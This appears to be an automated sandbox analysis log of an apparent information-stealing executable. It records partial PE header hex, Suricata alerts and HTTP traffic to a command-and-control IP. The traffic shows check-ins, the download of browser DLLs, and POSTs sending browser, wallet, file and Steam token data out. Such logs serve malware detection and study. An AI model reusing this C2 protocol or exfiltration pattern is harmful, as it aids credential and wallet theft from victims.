              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic
HTTP traffic detected: HTTP/1.1 200 OK
Date: Wed, 05 Mar 2025 08:25:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "6dde8-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 450024
Content-Type: application/x-msdos-program
Source: global traffic
HTTP traffic detected: HTTP/1.1 200 OK
Date: Wed, 05 Mar 2025 08:25:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "1f3950-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 2046288
Content-Type: application/x-msdos-program
Source: global traffic
HTTP traffic detected: HTTP/1.1 200 OK
Date: Wed, 05 Mar 2025 08:25:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "3ef50-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 257872
Content-Type: application/x-msdos-program
Source: global traffic
HTTP traffic detected: HTTP/1.1 200 OK
Date: Wed, 05 Mar 2025 08:25:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "13bf0-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 80880
Content-Type: application/x-msdos-program
Source: global traffic
HTTP traffic detected: GET / HTTP/1.1
Host: 185.215.113.115
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic
HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCG
Host: 185.215.113.115
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii:
------KEBFHIJECFIDGDGCGHCG
Content-Disposition: form-data; name="hwid"

992A4140186F1350827015
------KEBFHIJECFIDGDGCGHCG
Content-Disposition: form-data; name="build"

reno
------KEBFHIJECFIDGDGCGHCG--

Source: global traffic
HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JDAFBKECAKFCAAAKJDAK
Host: 185.215.113.115
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii:
------JDAFBKECAKFCAAAKJDAK
Content-Disposition: form-data; name="token"

f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070
------JDAFBKECAKFCAAAKJDAK
Content-Disposition: form-data; name="message"

browsers
------JDAFBKECAKFCAAAKJDAK--

Source: global traffic
HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAEC
Host: 185.215.113.115
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii:
------HJJKFBGCFHCGDHIDAAEC
Content-Disposition: form-data; name="token"

f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070
------HJJKFBGCFHCGDHIDAAEC
Content-Disposition: form-data; name="message"

plugins
------HJJKFBGCFHCGDHIDAAEC--

Source: global traffic
HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKE
Host: 185.215.113.115
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii:
------AFCBAEBAEBFHCAKFCAKE
Content-Disposition: form-data; name="token"

f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070
------AFCBAEBAEBFHCAKFCAKE
Content-Disposition: form-data; name="message"

fplugins
------AFCBAEBAEBFHCAKFCAKE--
Source: global traffic
HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGH
Host: 185.215.113.115
Content-Length: 6295
Connection: Keep-Alive
Cache-Control: no-cache

Source: global traffic
HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1
Host: 185.215.113.115
Cache-Control: no-cache

Source: global traffic
HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKECGHCFIJDAAKFHJJDH
Host: 185.215.113.115
Content-Length: 1003
Connection: Keep-Alive
Cache-Control: no-cache

Source: global traffic
HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GCFHDAKECFIDGDGDBKJD
Host: 185.215.113.115
Content-Length: 1451
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic
HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FHIDAFHCBAKFCAAKFCFC
Host: 185.215.113.115
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii:
------FHIDAFHCBAKFCAAKFCFC
Content-Disposition: form-data; name="token"

f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070
------FHIDAFHCBAKFCAAKFCFC
Content-Disposition: form-data; name="file_name"

c21qbGxteW1sYnpxLnB3ZA==
------FHIDAFHCBAKFCAAKFCFC
Content-Disposition: form-data; name="file"


------FHIDAFHCBAKFCAAKFCFC--

Source: global traffic
HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJE
Host: 185.215.113.115
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii:
------GHDAAKJEGCFCAKEBKJJE
Content-Disposition: form-data; name="token"

f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070
------GHDAAKJEGCFCAKEBKJJE
Content-Disposition: form-data; name="file_name"

c21qbGxteW1sYnpxLnB3ZA==
------GHDAAKJEGCFCAKEBKJJE
Content-Disposition: form-data; name="file"


------GHDAAKJEGCFCAKEBKJJE--
Source: global traffic
HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1
Host: 185.215.113.115
Cache-Control: no-cache

Source: global traffic
HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1
Host: 185.215.113.115
Cache-Control: no-cache

Source: global traffic
HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1
Host: 185.215.113.115
Cache-Control: no-cache

Source: global traffic
HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1
Host: 185.215.113.115
Cache-Control: no-cache

Source: global traffic
HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1
Host: 185.215.113.115
Cache-Control: no-cache

Source: global traffic
HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1
Host: 185.215.113.115
Cache-Control: no-cache

Source: global traffic
HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGID
Host: 185.215.113.115
Content-Length: 1067
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic
HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EGCGHCBKFCFBFHIDHDBF
Host: 185.215.113.115
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii:
------EGCGHCBKFCFBFHIDHDBF
Content-Disposition: form-data; name="token"

f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070
------EGCGHCBKFCFBFHIDHDBF
Content-Disposition: form-data; name="message"

wallets
------EGCGHCBKFCFBFHIDHDBF--

Source: global traffic
HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AAAKEBGDAFHIIDHIIECF
Host: 185.215.113.115
Content-Length: 265
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii:
------AAAKEBGDAFHIIDHIIECF
Content-Disposition: form-data; name="token"

f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070
------AAAKEBGDAFHIIDHIIECF
Content-Disposition: form-data; name="message"

files
------AAAKEBGDAFHIIDHIIECF--

Source: global traffic
HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AFIIEBGCAAECBGCBGCBK
Host: 185.215.113.115
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii:
------AFIIEBGCAAECBGCBGCBK
Content-Disposition: form-data; name="token"

f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070
------AFIIEBGCAAECBGCBGCBK
Content-Disposition: form-data; name="file_name"

c3RlYW1fdG9rZW5zLnR4dA==
------AFIIEBGCAAECBGCBGCBK
Content-Disposition: form-data; name="file"


------AFIIEBGCAAECBGCBGCBK--

Source: global traffic
HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGID
Host: 185.215.113.115
Content-Length: 272
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii:
------JJJKFBAAAFHJEBFIEGID
Content-Disposition: form-data; name="token"

f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070
------JJJKFBAAAFHJEBFIEGID
Content-Disposition: form-data; name="message"

ybncbhylepme
------JJJKFBAAAFHJEBFIEGID--

Source: global traffic
HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCA
Host: 185.215.113.115
Content-Length: 272
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii:
------DHIEBAAKJDHIECAAFHCA
Content-Disposition: form-data; name="token"

f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070
------DHIEBAAKJDHIECAAFHCA
Content-Disposition: form-data; name="message"

wkkjqaiaxkhb
------DHIEBAAKJDHIECAAFHCA--
Source: Joe Sandbox View
IP Address: 239.255.255.250

Source: Joe Sandbox View
IP Address: 185.215.113.115

Source: Joe Sandbox View
ASN Name: WHOLESALECONNECTIONSNL

Source: Joe Sandbox View
JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3

Source: Network traffic
Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49733 -> 185.215.113.115:80

Source: Network traffic
Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49759 -> 185.215.113.115:80

Source: unknown
TCP traffic detected without corresponding DNS query: 173.222.162.32

Source: unknown
TCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: C:\Users\user\Desktop\random(1).exe | Code function: 0_2_6C59CC60 PR_Recv,0_2_6C59CC60
              Source: global traffic | HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global traffic | HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global traffic | HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global traffic | HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global traffic | HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global traffic | HTTP traffic detected: GET /th?id=OADD2.10239385917469_1PJ7CJICMRWKJR5SF&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /th?id=OADD2.10239385917470_1O4L0U46N29EF81I2&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /th?id=OADD2.10239354941421_1QFMKZTDAH37OHMPJ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /th?id=OADD2.10239354941422_128KB82EECTAVENHE&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /th?id=OADD2.10239400678274_1AGJJ9P2O7V6V1431&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /th?id=OADD2.10239400678275_1MGQ4V998SN0MOXXU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global traffic | DNS traffic detected: DNS query: www.google.com
              Source: global traffic | DNS traffic detected: DNS query: apis.google.com
              Source: global traffic | DNS traffic detected: DNS query: play.google.com
              Source: unknown | HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 907sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: random(1).exe, 00000000.00000002.2013235084.000000000089E000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://185.215.113.115
              Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/freebl3.dll
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/freebl3.dllO
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/freebl3.dllbN
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/mozglue.dll
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/mozglue.dlle
              Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/msvcp140.dll
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/msvcp140.dllBN
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/msvcp140.dllzN
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/nss3.dll
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/nss3.dllw
              Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2025447897.000000000B6A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/softokn3.dll
              Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/softokn3.dllA
              Source: random(1).exe, 00000000.00000002.2013235084.00000000008BD000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/sqlite3.dll
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/sqlite3.dll=
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll.
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll;
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dllc
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dlln
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dlls
              Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/Y
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.000000000089E000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php%0
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php3
              Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpAAFBGDBKJJJKFIIIJ
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpC
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpO
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpR0
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpW
